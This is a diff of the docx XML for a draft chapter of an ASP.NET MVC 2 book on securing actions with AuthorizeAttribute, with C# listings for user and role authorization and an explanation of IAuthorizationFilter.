-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> several attack vectors, but we'll focus on some common ones: cross-site scripting (XSS), cross-site request forgery (CSRF), and a special cross-site request forgery called JSON hijacking.</w:t>
+        <w:t xml:space="preserve"> common web attack vectors and technical vulnerabilities that allow attackers to bypass authentication or authorization.  There are several attack vectors, but we'll focus on some common ones: cross-site scripting (XSS), cross-site request forgery (CSRF), and a special cross-site request forgery called JSON hijacking.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -181,47 +195,37 @@
       <w:r>
         <w:t xml:space="preserve">ASP.NET MVC 2 ships with a filter attribute </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> that provides out of the box authentication and authorization.  Developers can apply the attribute to actions to </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>restrict</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> access to them.</w:t>
+      <w:r>
+        <w:t xml:space="preserve"> that provides out of the box authentication and authorization.  Developers can apply the attribute to actions to restrict access to them.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> short-circuits the normal response.  If the user is not permitted, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t xml:space="preserve"> short-circuits the normal response.  If the </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">user is not permitted, </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> will transmit to the browser an HTTP status code of </w:t>
       </w:r>
@@ -250,27 +254,17 @@
         <w:t xml:space="preserve">.  </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Applications using </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ASP.NET's</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> forms authentication mechanism </w:t>
+        <w:t xml:space="preserve">Applications using ASP.NET's forms authentication mechanism </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">and with a login page specified in </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>Web.config</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -283,233 +277,150 @@
         <w:pStyle w:val="Head2"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">11.1.1 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Requiring</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> authentication with </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t>11.1.1 Requiring authentication with AuthorizeAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+      </w:pPr>
+      <w:r>
+        <w:t>The simplest use of the AuthorizeAttribute</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, shown in listing 11.1,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> only requires that the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">current </w:t>
+      </w:r>
+      <w:r>
+        <w:t>user be authenticated.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeListingCaption"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Listing 11.1 Authentication with the AuthorizeAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>[Authorize]</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">                    #1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>public ActionResult About()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>return View();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeAnnotation"/>
+      </w:pPr>
+      <w:r>
+        <w:t>#1 AuthorizeAttribute applied to About action</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body1"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">When this action is requested by an unauthenticated user, the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The simplest use of the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+      <w:r>
+        <w:t xml:space="preserve"> will prevent access to it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>11.1.2 Requiring authorization with AuthorizeAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>To restrict a</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">n action further, developers can specify users or roles that the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, shown in listing 11.1,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> only requires that the </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">current </w:t>
-      </w:r>
-      <w:r>
-        <w:t>user be authenticated.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeListingCaption"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Listing 11.1 Authentication with the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+      <w:r>
+        <w:t xml:space="preserve"> requires. These roles or users are passed to the attribute using a comma-delimited list of strings - either the usernames or the roles allowed. Listing 11.2 shows the </w:t>
+      </w:r>
+      <w:commentRangeStart w:id="5"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>[Authorize]</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">                    #1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>public</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ActionResult</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> About()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>return</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> View();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeAnnotation"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">#1 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> applied to </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>About</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> action</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body1"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">When </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>this action is requested by an unauthenticated user</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> will prevent access to it.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Head2"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">11.1.2 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Requiring</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> authorization with </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>To restrict a</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">n action further, developers can specify users or roles that the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> requires. These roles or users are passed to the attribute using a comma-delimited list of strings - either the usernames or the roles allowed. Listing 11.2 shows the </w:t>
-      </w:r>
-      <w:commentRangeStart w:id="4"/>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>AuthorizeAttribute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="4"/>
+      <w:commentRangeEnd w:id="5"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CommentReference"/>
           <w:vanish/>
         </w:rPr>
-        <w:commentReference w:id="4"/>
+        <w:commentReference w:id="5"/>
       </w:r>
       <w:r>
         <w:t>syntax for requiring a specific user.</w:t>
@@ -520,60 +431,330 @@
         <w:pStyle w:val="CodeListingCaption"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Listing 11.2 User authorization with the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t>Listing 11.2 User authorization with the AuthorizeAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>[Authorize(Users = "admin")]</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  #1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>public ActionResult Admins()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>return View();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeAnnotation"/>
+      </w:pPr>
+      <w:r>
+        <w:t>#1 Users property requires specific users</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Hardcoding a username like this may be too tightly controlling.  Users come and go and the duties of a given user may change during their time using the application.  Instead of requiring a specific user it usually makes sense to require a role.  Listing 11.3 demonstrates how develoeprs can use the AuthorizeAttribute to restrict an action to certain roles.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeListingCaption"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Listing 11.3 Role authorization with the AuthorizeAttribute</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>[Authorize(Roles = "admins, developers")]</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  #1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>public ActionResult Developers()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>return View();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeAnnotation"/>
+      </w:pPr>
+      <w:r>
+        <w:t>#1 Multiple roles are comma delimited</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body1"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>Developers</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> action will only be allowed to users in the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>admins</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> or </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>developers</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> roles - all other users (authenticated or not) will be issued a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>401</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> response code and using ASP.NET's forms authentication, redirected to the login page. Now that we've seen a few examples of how the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Authorize(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>Users = "admin")]</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  #1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>public</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ActionResult</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Admins</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>()</w:t>
+      <w:r>
+        <w:t xml:space="preserve"> is used, let's talk about how it works.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>11.1.3 AuthorizeAttribute - how it works</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> checks the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>IPrincipal</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> associated with the current </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>HttpContext</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. When </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>Users</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> or </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>Roles</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is specified, it ensures the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>IPrincipal</w:t>
+      </w:r>
+      <w:r>
+        <w:t>'s username is in the allowed usernames, or a member of one of the granted roles.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">If </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is applied to a controller, it is applied to every action in that controller.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">If multiple </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>AuthrorizeAttributes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> are applied to an action, all checks occur and the user must be authorized by all of them.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> implements a special interface called </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>IAuthorizationFilter</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">.  When applied to an action, IAuthorizationFilter will execute before any other action filters, and of course before the normal result. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Listing 11.4 shows the declaration of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>IAuthorizationFilter</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeListingCaption"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Listing 11.4 IAuthorizationFilter</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>public interface IAuthorizationFilter</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -590,14 +771,10 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>return</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> View();</w:t>
+        <w:t>void OnAuthorization(AuthorizationContext filterContext);</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">   #1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -610,667 +787,170 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="CodeAnnotation"/>
-      </w:pPr>
-      <w:r>
-        <w:t>#1 Users property requires specific users</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Body1"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Hardcoding</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> a username like this may be too tightly controlling.  Users come and go and the duties of a given user may change during their time using the application.  Instead of requiring a specific user it usually makes sense to require a role.  Listing 11.3 demonstrates how </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>develoeprs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> can use the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+      <w:r>
+        <w:t xml:space="preserve">If you wanted to create your own filter attribute for authentication or authorization, you could implement this interface as an action filter and apply it to an action. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> to restrict an action to certain roles.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeListingCaption"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Listing 11.3 Role authorization with the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+      <w:r>
+        <w:t xml:space="preserve"> does its security check in the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>OnAuthorization</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> method (1)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, and sets the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>AuthorizationContext</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">'s </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>Result</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> property to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>HttpUnauthorizedResult</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> - the mechanism for returning that </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>401</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> status code</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">There are several other </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+        <w:t>IAuthenticationFilter</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> implementations in ASP.NET MVC; all are used to short-circuit the normal response to protect against undesired requests.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  Chapter 9 covered filters, and these five filters deal specifically with security.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
+      </w:pPr>
+      <w:commentRangeStart w:id="6"/>
+      <w:commentRangeStart w:id="7"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+        </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Authorize(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>Roles = "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>admins</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, developers")]</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  #1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>public</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ActionResult</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Developers()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
